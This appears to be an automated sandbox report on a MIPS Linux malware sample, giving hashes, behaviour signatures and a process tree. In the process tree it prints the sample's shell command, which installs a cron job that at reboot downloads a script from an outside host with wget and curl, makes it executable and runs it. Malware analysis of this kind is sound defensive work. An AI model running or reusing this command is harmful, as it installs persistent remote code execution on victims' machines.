Analysis

  • max time kernel
    143s
  • max time network
    140s
  • platform
    debian-9_mips
  • resource
    debian9-mipsbe-20240611-en
  • resource tags

    arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem
  • submitted
    27-10-2024 02:24

General

  • Target

    5e0ce8c68000a777556e21b71e015b368a8b361409ba0051bc93cd519c99f7cb.elf

  • Size

    99KB

  • MD5

    36e86bb02185647aa672a226e7fe224f

  • SHA1

    66de8267b6fbef3423a21ed56e1fd68265882666

  • SHA256

    5e0ce8c68000a777556e21b71e015b368a8b361409ba0051bc93cd519c99f7cb

  • SHA512

    011ca601c3481c0ef30b4f3481e88dd05e329f1e129229cf5921e6ebf5b78806d6c8568a25ad0dd62cfd790e97fbf3d74efc047a457245647ebc939814c88cf0

  • SSDEEP

    1536:F6KyNOhiWfjZsF1LtLGgZRSKRSaySRUUkvjMS1BEYoiueZ9DWK+FSn+:fzh1slGgCvjMS1KdC+w+

Malware Config

Signatures

  • File and Directory Permissions Modification 1 TTPs 1 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Renames itself 1 IoCs
  • Unexpected DNS network traffic destination 2 IoCs

    Network traffic to other servers than the configured DNS servers was detected on the DNS port.

  • Creates/modifies Cron job 1 TTPs 1 IoCs

    Cron allows running tasks on a schedule, and is commonly used for malware persistence.

  • Changes its process name 1 IoCs
  • Reads runtime system information 3 IoCs

    Reads data from /proc virtual filesystem.

Processes

  • /tmp/5e0ce8c68000a777556e21b71e015b368a8b361409ba0051bc93cd519c99f7cb.elf
    /tmp/5e0ce8c68000a777556e21b71e015b368a8b361409ba0051bc93cd519c99f7cb.elf
    1⤵
    • Renames itself
    • Changes its process name
    • Reads runtime system information
    PID:709
    • /bin/sh
      sh -c "(crontab -l ; echo \"@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh\") | crontab -"
      2⤵
      • File and Directory Permissions Modification
      PID:711
      • /usr/bin/crontab
        crontab -
        3⤵
        • Creates/modifies Cron job
        • Reads runtime system information
        PID:713
      • /usr/bin/crontab
        crontab -l
        3⤵
        • Reads runtime system information
        PID:714

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • /var/spool/cron/crontabs/tmp.dQCYhx

    Filesize

    306B

    MD5

    f3ce9d7a4a91e5fd83d71554c65e28dd

    SHA1

    92f5357290d7c8b4d7f31552e22f6c0c7b2c1248

    SHA256

    31a0a02ee271e3d7233ac8ae401cb0b9c0561f6604e18077d4a1d5892616e1cf

    SHA512

    11e5be7af45d81b7aec59b576cb46621f9c9d290cd8b2e619c777400ae8a2d9452d0c0e97662f5043e1d6622292100f3f20e69b747eb829288211544f597e2b0